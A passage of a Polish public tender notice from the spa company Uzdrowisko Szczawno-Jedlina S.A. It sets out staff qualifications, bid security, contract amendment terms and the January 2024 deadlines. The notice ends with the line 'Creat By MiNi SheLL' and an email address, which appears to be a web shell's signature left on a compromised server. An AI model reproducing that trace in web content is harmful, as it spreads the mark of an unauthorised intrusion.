Wykonawca wykaże (zał. nr 8 do SWZ) min:<br/> Kierownika budowy: ważne uprawnienia do kierowania robotami w branży konstrukcyjno- budowlanej lub równoważnej bez<br/>ograniczeń. Kierownik budowy musi posiadać co najmniej 2-letnią praktykę zawodową oraz doświadczenie na budowie przy<br/>obiektach wpisanych do rejestru zabytków - należy wykazać min. 2 roboty na obiektach wpisanych do rejestru zabytków.<br/>1) Osobę uprawnioną do kierowania pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi,<br/>prowadzonymi przy zabytkach wpisanych do rejestru zgodnie z art. 37a ust 1 i 2 obowiązującej Ustawy o ochronie zabytków i opiece<br/>nad zabytkami.<br/>Uwaga: Zamawiający uzna także za spełnienie powyższego warunku sytuację, gdzie jedna osoba spełnia oba powyższe wymogi.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. Dysponowania odpowiednimi osobami również poprzez<br/>wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie przepisów oraz<br/>odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym oraz<br/>innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> oświadczenia i zobowiązania opisane w SWZ - adekwatnie do potrzeby.<br/>Pełnomocnictwo - jeśli wymagane na podstawie obowiązujących przepisów <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymagania dotyczące wadium<br/>1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 10 000 (słownie: dziesięć tysięcy zł).<br/>2. Wadium musi obejmować pełen okres związania ofertą. Przy wnoszeniu wadium prosimy zaznaczyć czego dotyczy<br/>(sprawa ZP 38/2023)<br/>3. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>- Pieniądzu: wymaganą kwotę należy wpłacić przelewem na rachunek bankowy w banku ING Bank Śląski SA o/Wałbrzych<br/>nr 83 1050 1908 1000 0022 4367 3353<br/>- Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert<br/>(decyduje data wpływu na rachunek bankowy zamawiającego);<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>5. W przypadku wnoszenia przez wykonawcę wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinny być<br/>sporządzone zgodnie z obowiązującym prawem i zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zamawiający Uzdrowisko Szczawno-Jedlina<br/>S.A.,<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta, do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Prawo Zamówień Publicznych.<br/>6. W przypadku gdy wykonawca nie wniósł wadium lub wniósł je w sposób nieprawidłowy, lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą bądź złożył wniosek o zwrot wadium w przypadku, o którym mowa w art.<br/>98 ust. 2 pkt 3 ustawy Prawo Zamówień Publicznych, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy<br/>Prawo Zamówień Publicznych.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Prawo Zamówień Publicznych.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Prawo Zamówień Publicznych <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianiewarunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.3. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane/dostawy/usługi wykonają poszczególni wykonawcy.4. Oświadczenia i dokumenty potwierdzające brak podstaw<br/>do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmiany postanowień zawartej Umowy w zakresie:<br/>1) wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową w sytuacji, gdy wykonanie tych<br/>robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru<br/>robót przepisami wykonania przedmiotu Umowy i nie spowoduje podniesienia kosztów;<br/>2) rezygnacji z wykonywania części (elementów) przedmiotu Umowy przewidzianych w dokumentacji projektowej w sytuacji,<br/>gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień<br/>odbioru robót przepisami wykonania przedmiotu Umowy. Roboty takie nazywane są „robotami zaniechanymi”, a ich wartość<br/>nie może przekroczyć 20 % wartości umowy brutto;<br/>3) zmiany stawki podatku VAT w przypadku urzędowej zmiany stawki podatku VAT;<br/>zmiany formy rozliczania np. co do ilości wystawionych faktur, jeśli będzie to akceptowalne dla Zamawiającego;<br/>4) zmiany formy prawnej Zamawiającego;<br/>5) terminu wykonania oraz przedmiotu zamówienia w niezbędnym zakresie, nie prowadzącym jednak do zwiększenia jego<br/>wielkości lub zakresu i pod warunkiem, że będą one korzystne dla Zmawiającego, o ile będzie to konieczne z uwagi na<br/>nieprzewidziane okoliczności, na które Wykonawca nie miał wpływu np. ujawnienie błędów w dokumentacji;<br/>6) zamiany materiałów, przyjętych rozwiązań itp. pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to<br/>przykładowo okoliczności:<br/>a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację<br/>i konserwację wykonanego przedmiotu umowy;<br/>b) powodujące poprawienie parametrów technicznych;<br/>c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany potrzeb Zamawiającego lub zmiany<br/>obowiązujących przepisów.<br/>Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów pod warunkiem, że zmiana ta nie spowoduje<br/>obniżenia parametrów tych materiałów.<br/>7) wszelkich zmian Umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian<br/>w obowiązujących przepisach prawa;<br/>8) aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów;<br/>9) terminu wykonania w przypadku:<br/>a) przestojów i opóźnień zawinionych przez Zamawiającego, lub innego Wykonawcy zatrudnionego przez Zamawiającego<br/>na Terenie Budowy, albo z powodu innych przyczyn o obiektywnym charakterze, których nie dało się wcześniej przewidzieć.<br/>b) działania siły wyższej (na przykład klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na<br/>terminowość wykonywania robót;<br/>c) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót – fakt ten musi zostać zgłoszony<br/>Zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru;<br/>d) wystąpienia okoliczności, których Strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej<br/>staranności;<br/>e) wykopalisk/znalezisk uniemożliwiających wykonywanie robót;<br/>f) podpisania umowy na zamówienia wykraczające poza przedmiot zamówienia podstawowego o ile wykonywanie tych<br/>zamówień wpływa na termin wykonania niniejszej umowy;<br/>10) podwykonawców;<br/>cd w informacjach uzupełniających/dodatkowych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-05 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-05 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> dalsza część dot. zmian umowy:<br/>11)	zmiany osób reprezentujących lub wykonujących funkcje kierownicze, pod warunkiem wcześniejszego powiadomienia drugiej strony, w następujących przypadkach:<br/>a)	śmierci, choroby lub innych zdarzeń losowych;<br/>b)	niewywiązywania się z obowiązków wynikających z Umowy;<br/>c)	jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji);<br/>d)	Wykonawca może dokonywać zmiany Kluczowych Specjalistów, tj. kierownika budowy lub osoby uprawnionej do kierowania pracami konserwatorskimi na zabytkach przedstawionych <br/>w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego Kluczowego Specjalistę;<br/>e)	Wykonawca z własnej inicjatywy proponuje zmianę Kluczowych Specjalistów w następujących przypadkach:<br/>	śmierci, choroby lub innych zdarzeń losowych Kluczowego Specjalisty;<br/>	niewywiązywania się Kluczowego Specjalisty z obowiązków wynikających z Umowy;<br/>	jeżeli zmiana Kluczowego Specjalisty stanie się konieczna z innych przyczyn niezależnych od Wykonawcy (np. rezygnacji);<br/>f)	jeżeli Zamawiający uzna, że Kluczowy Specjalista nie wykonuje swoich obowiązków wynikających z Umowy, może żądać od Wykonawcy zmiany Kluczowego Specjalisty. <br/>W przypadku zmiany Kluczowego Specjalisty nowy Kluczowy Specjalista musi spełniać wymagania określone dla danego specjalisty.<br/>12)	w przypadku, gdy Zamawiający pozostaje w zwłoce w udostępnieniu Terenu Budowy, wymaganej dokumentacji, termin realizacji zamówienia ulega automatycznie przedłużeniu o ilość dni zwłoki, <br/>w jakiej pozostaje Zamawiający (od dnia powstania zwłoki do dnia protokolarnego przekazania Terenu Budowy lub określonej dokumentacji). Wystąpienie takiej sytuacji wymaga stosownej notatki służbowej zaakceptowanej przez Inspektora Nadzoru oraz Zamawiającego, a także sporządzenia aneksu do Umowy w formie pisemnej pod rygorem nieważności;<br/>13)	Zamawiający dopuszcza ewentualne zmiany w zakresie Harmonogramu rzeczowo-finansowego, jeżeli będą one uzasadnione organizacyjnie i technicznie i będą korzystne dla Zamawiającego pod względem zapewnienia możliwości realizowania świadczeń medycznych;<br/>14)	Zmiana formy zabezpieczenia Umowy: zmiana przewidziana w art. 451 ustawy Prawo Zamówień Publicznych;<br/>15)	Zmiana Podwykonawców: w przypadku wprowadzenia Podwykonawcy, wprowadzenia nowego (kolejnego) Podwykonawcy, rezygnacji Podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez Podwykonawcę. Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z Podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie.<br/>16)	zmiana wynagrodzenia, o którym mowa w § 15 ust. 1 Umowy związana z koniecznością rezygnacji przez Zamawiającego z wykonania części zamówienia o wartość wynikającą z zestawienia kosztów, przy czym wartość zmiany nie może przekroczyć 20% wartości umowy brutto.<br/>17)	Jeżeli ma to wpływ na koszt wykonania zamówienia, dopuszczalna jest zmiana wysokości wynagrodzenia z uwzględnieniem zmian w zakresie:<br/>	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę<br/>	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342 oraz z 2022 r. poz. 1079)

Creat By MiNi SheLL
Email: jattceo@gmail.com